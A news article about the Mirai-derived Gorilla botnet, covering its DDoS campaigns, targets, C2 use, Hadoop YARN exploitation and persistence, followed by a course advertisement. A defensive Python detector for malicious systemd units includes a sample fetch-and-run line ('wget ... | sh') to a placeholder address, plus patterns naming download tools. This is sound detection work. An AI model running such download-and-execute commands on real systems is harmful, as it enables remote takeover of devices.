Cybersecurity experts have discovered a new botnet called Gorilla (also known as GorillaBot), which is built from the leaked Mirai botnet source code. This botnet is creating significant disruptions around the world.

According to cybersecurity firm NSFOCUS, the Gorilla botnet launched over 300,000 attack commands between September 4 and September 27, 2024. On average, 20,000 commands per day were used to perform distributed denial-of-service (DDoS) attacks, with a high intensity of attacks aimed at over 100 countries. The main targets include universities, government websites, telecom companies, banks, gaming platforms, and gambling sectors. China, the U.S., Canada, and Germany have been the most affected.

The Gorilla botnet uses various techniques to launch DDoS attacks, such as UDP flood, SYN flood, and ACK flood methods. These attacks generate large volumes of fake traffic that are hard for victims to manage. Because UDP is connectionless, attackers can spoof source IP addresses, which makes this type of attack especially dangerous.

What makes Gorilla even more concerning is its capability to run on various systems, including ARM, MIPS, and x86 processors. It also connects to one of five command-and-control (C2) servers to receive attack commands.

In addition, Gorilla exploits a known security flaw in Apache Hadoop YARN RPC, which allows hackers to remotely control affected systems. Although this vulnerability has been abused since 2021, Gorilla continues to take advantage of it.

Once the malware infects a device, it creates a service file that ensures it automatically runs whenever the system starts. It downloads and runs a malicious script from a remote server to maintain control over the device. Gorilla also uses encryption techniques to avoid detection, making it more challenging for cybersecurity experts to combat.
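Defenders can hunt for the persistence pattern described above by checking systemd unit files for start commands that download and then run remote content. The Python below is an added example, not code from NSFOCUS or from this article; the heuristics, unit names, paths and addresses are constructed assumptions.

```python
import re

# Heuristics (assumptions of this example): a download tool, plus either a
# pipe into a shell, a shell run chained after the download, or chmod +x.
FETCH = re.compile(r"\b(?:curl|wget|tftp|ftpget)\b")
RUN = re.compile(r"\|\s*(?:ba)?sh\b|(?:&&|;)\s*(?:/bin/)?(?:ba)?sh\s+\S|\bchmod\s+\+x\b")
URL = re.compile(r"(?:https?|ftp|tftp)://[^\s'\";|&]+")
START_KEYS = ("ExecStartPre", "ExecStart", "ExecStartPost")

def parse_unit(text):
    """Return {(section, key): [values]} for systemd unit-file text."""
    entries, section, pending = {}, None, ""
    for raw in text.splitlines():
        line, pending = pending + raw.strip(), ""
        if line.endswith("\\"):              # systemd line continuation
            pending = line[:-1] + " "
            continue
        if not line or line[0] in "#;":      # blank line or comment
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1]
        elif "=" in line and section:
            key, value = line.split("=", 1)
            entries.setdefault((section, key.strip()), []).append(value.strip())
    return entries

def assess_unit(name, text):
    """List start commands in one unit that download and then run content."""
    unit = parse_unit(text)
    # WantedBy only takes effect once the unit is enabled; it shows boot intent.
    at_boot = bool(unit.get(("Install", "WantedBy")))
    findings = []
    for key in START_KEYS:
        for cmd in unit.get(("Service", key), []):
            if FETCH.search(cmd) and RUN.search(cmd):
                findings.append({"unit": name, "key": key, "at_boot": at_boot,
                                 "urls": URL.findall(cmd), "command": cmd})
    return findings

# Constructed sample units; names, paths and addresses are placeholders.
SUSPECT = """[Service]
ExecStart=/bin/sh -c 'wget -q -O- http://203.0.113.10/placeholder.sh | sh'
[Install]
WantedBy=multi-user.target
"""
BENIGN = "[Service]\nExecStart=/usr/local/bin/backup.sh --target /srv/backup\n"
if __name__ == "__main__":
    for unit_name, body in (("helper.service", SUSPECT), ("backup.service", BENIGN)):
        print(unit_name, assess_unit(unit_name, body))
```

On a live host, pass it the contents of unit files under `/etc/systemd/system` and `/usr/lib/systemd/system`, and treat any finding as a lead for manual review rather than a verdict.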

The rise of the Gorilla botnet is a reminder of the ever-growing threats in the digital world. Businesses, governments, and individuals need to remain vigilant against these emerging attacks.

Want to learn how to defend against such sophisticated cyber threats? Enroll in our comprehensive One-Year Cybersecurity Diploma, where we cover real-world security risks and solutions!
